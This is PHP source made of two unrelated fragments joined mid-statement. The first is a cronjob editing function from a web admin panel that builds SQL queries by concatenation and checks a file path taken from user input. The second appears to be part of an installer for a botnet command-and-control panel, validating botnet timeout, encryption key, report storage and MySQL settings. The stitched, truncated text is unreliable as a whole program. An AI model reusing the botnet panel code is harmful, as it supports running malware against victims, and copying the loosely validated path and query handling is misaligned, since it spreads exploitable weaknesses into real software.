function ShowCronjobEdit() { global $LNG; $post_id = HTTP::_GP('id', 0); $post_name = HTTP::_GP('name', ''); $post_min = checkPostData('min', 59); $post_hours = checkPostData('hours', 23); $post_month = checkPostData('month', 12); $post_dow = checkPostData('dow', 6); $post_dom = checkPostData('dom', 31); $post_class = HTTP::_GP('class', ''); $error_msg = array(); if ($post_name == '') { $error_msg[] = $LNG['cronjob_error_name']; } if ($post_min === false) { $error_msg[] = $LNG['cronjob_error_min']; } if ($post_hours === false) { $error_msg[] = $LNG['cronjob_error_hours']; } if ($post_month === false) { $error_msg[] = $LNG['cronjob_error_month']; } if ($post_dow === false) { $error_msg[] = $LNG['cronjob_error_dow']; } if ($post_dom === false) { $error_msg[] = $LNG['cronjob_error_dom']; } if ($post_class == '') { $error_msg[] = $LNG['cronjob_error_class']; } elseif (!file_exists('includes/classes/cronjob/' . $post_class . '.class.php')) { $error_msg[] = $LNG['cronjob_error_filenotfound'] . 'includes/classes/cronjobs/' . $post_class . '.class.php'; } if (count($error_msg) == 0) { if ($post_id != 0) { $GLOBALS['DATABASE']->query("UPDATE " . CRONJOBS . " SET name = '" . $GLOBALS['DATABASE']->sql_escape($post_name) . "', min = '" . $post_min . "', hours = '" . $post_hours . "', month = '" . $post_month . "', dow = '" . $post_dow . "', dom = '" . $post_dom . "', class = '" . $GLOBALS['DATABASE']->sql_escape($post_class) . "' WHERE cronjobID = {$post_id};"); } else { $GLOBALS['DATABASE']->query("INSERT INTO " . CRONJOBS . " SET name = '" . $GLOBALS['DATABASE']->sql_escape($post_name) . "', min = '" . $post_min . "', hours = '" . $post_hours . "', month = '" . $post_month . "', dow = '" . $post_dow . "', dom = '" . $post_dom . "', class = '" . $GLOBALS['DATABASE']->sql_escape($post_class) . "';"); } ShowCronjobOverview(); } else { ShowCronjobDetail($post_id, $error_msg); } }
$pd_mysql_db = isset($config['mysql_db']) ? $config['mysql_db'] : NULL; } } else { $pd_user = checkPostData('user', 1, 20); $pd_pass = checkPostData('pass', 6, 64); $pd_reports_path = checkPostData('path_reports', 1, 256); $pd_reports_to_db = isset($_POST['reports_to_db']); // && $_POST['reports_to_db'] == 1); $pd_reports_to_fs = isset($_POST['reports_to_fs']); // && $_POST['reports_to_fs'] == 1); $pd_botnet_timeout = checkPostData('botnet_timeout', 1, 4); $pd_botnet_cryptkey = checkPostData('botnet_cryptkey', 1, 256); $pd_mysql_host = checkPostData('mysql_host', 1, 256); $pd_mysql_user = checkPostData('mysql_user', 1, 256); $pd_mysql_pass = checkPostData('mysql_pass', 0, 256); $pd_mysql_db = checkPostData('mysql_db', 1, 256); } $pd_reports_path = trim(str_replace('\\', '/', trim($pd_reports_path)), '/'); //Обработка ошибок. if (!$error) { if (!$is_update && ($pd_user === NULL || $pd_pass === NULL)) { ShowError('Bad format of login data.'); $error = true; } if ($pd_mysql_host === NULL || $pd_mysql_user === NULL || $pd_mysql_db === NULL) { ShowError('Bad format of MySQL server data.'); $error = true; } if ($pd_reports_path === NULL) { ShowError('Bad format of reports path.'); $error = true;